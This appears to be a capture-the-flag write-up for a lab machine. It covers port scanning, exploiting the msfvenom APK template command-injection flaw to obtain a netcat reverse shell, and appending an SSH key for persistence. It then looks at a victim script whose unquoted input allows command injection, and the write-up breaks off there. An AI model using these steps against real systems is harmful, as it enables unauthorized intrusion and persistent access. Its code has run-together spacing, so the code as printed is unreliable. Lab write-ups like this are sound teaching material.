# Nmap 7.91 scan initiated Mon Feb 8 19:00:29 2021 as: nmap -sSVC -p- -v -oA nmap_scan 10.129.77.135 Nmap scan report for 10.129.77.135 Host is up (0.029s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA) | 256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA) |_ 256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519) 5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5) | http-methods: |_ Supported Methods: POST HEAD GET OPTIONS |_http-title: k1d'5 h4ck3r t00l5 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon Feb 8 19:00:54 2021 -- 1 IP address (1 host up) scanned in 25.42 seconds
The page is named k1d'5 h4ck3r t00l5 and allow us to use some commands:
nmap: nmap
payloads: msfvenom from metasploit
sploits: searchploit from exploit-db
On the msfvenom, we have the option to upload a custom template.
But there is a new vulnerability:
This module exploits a command injection vulnerability in Metasploit
Framework's msfvenom payload generator when using a crafted APK file
as an Android payload template. Affects Metasploit Framework <=
6.0.11 and Metasploit Pro <= 4.18.0. The file produced by this
module is a relatively empty yet valid-enough APK file. To trigger
the vulnerability, the victim user should do the following: msfvenom
-p android/<...> -x <crafted_file.apk>
Name Current Setting Required Description ---- --------------- -------- ----------- FILENAME msf.apk yes The APK file name
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description ---- --------------- -------- ----------- LHOST tun0 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port
**DisablePayloadHandler: True (no handler will be created!)**
Exploit target:
Id Name -- ---- 0 Automatic
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > run
[+] msf.apk stored at /home/noraj/.msf4/local/msf.apk
Then we select android, specify our template and set whatever a lhost.
On our machine we just launch a listener:
1 2 3 4 5 6
$ pwncat -l 4444 -vv INFO: Listening on :::4444 (family 10/IPv6, TCP) INFO: Listening on 0.0.0.0:4444 (family 2/IPv4, TCP) INFO: Client connected from 10.129.77.135:43478 (family 2/IPv4, TCP) id uid=1000(kid) gid=1000(kid) groups=1000(kid)
Note: has been patched, there is no longer some ssh key but we can add ours:
printf %s 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINDGLndVd+2+y7FE7nVTrMtBvPiLNTMgObVw8s7d9B8n noraj@penarch' >> /home/kid/.ssh/authorized_keys.
There is another user named pwn owning a script: /home/pwn/scanlosers.sh.
1 2 3 4 5 6 7 8 9 10
#!/bin/bash
log=/home/kid/logs/hackers
cd /home/pwn/ cat$log | cut -d' ' -f3- | sort -u | whileread ip; do sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" & done
if [[ $(wc -l < $log) -gt 0 ]]; thenecho -n > $log; fi
We have write access to /home/kid/logs/hackers. We can see that our date and
IP is written to this file when we try to bypass the searchploit function:
import datetime import os import random import re import subprocess import tempfile import time from flask import Flask, render_template, request from hashlib import md5 from werkzeug.utils import secure_filename
defscan(ip): if regex_ip.match(ip): ifnot ip == request.remote_addr and ip.startswith('10.10.1') andnot ip.startswith('10.10.10.'): stime = random.randint(200,400)/100 time.sleep(stime) result = f"""Starting Nmap 7.80 ( https://nmap.org ) at {datetime.datetime.utcnow().strftime("%Y-%m-%d %H:%M")} UTC\nNote: Host seems down. If it is really up, but blocking our ping probes, try -Pn\nNmap done: 1 IP address (0 hosts up) scanned in {stime} seconds""".encode() else: result = subprocess.check_output(['nmap', '--top-ports', '100', ip]) return render_template('index.html', scan=result.decode('UTF-8', 'ignore')) return render_template('index.html', scanerror="invalid ip")
defsearchsploit(text, srcip): if regex_alphanum.match(text): result = subprocess.check_output(['searchsploit', '--color', text]) return render_template('index.html', searchsploit=result.decode('UTF-8', 'ignore')) else: withopen('/home/kid/logs/hackers', 'a') as f: f.write(f'[{datetime.datetime.now()}] {srcip}\n') return render_template('index.html', sserror="stop hacking me - well hack you back")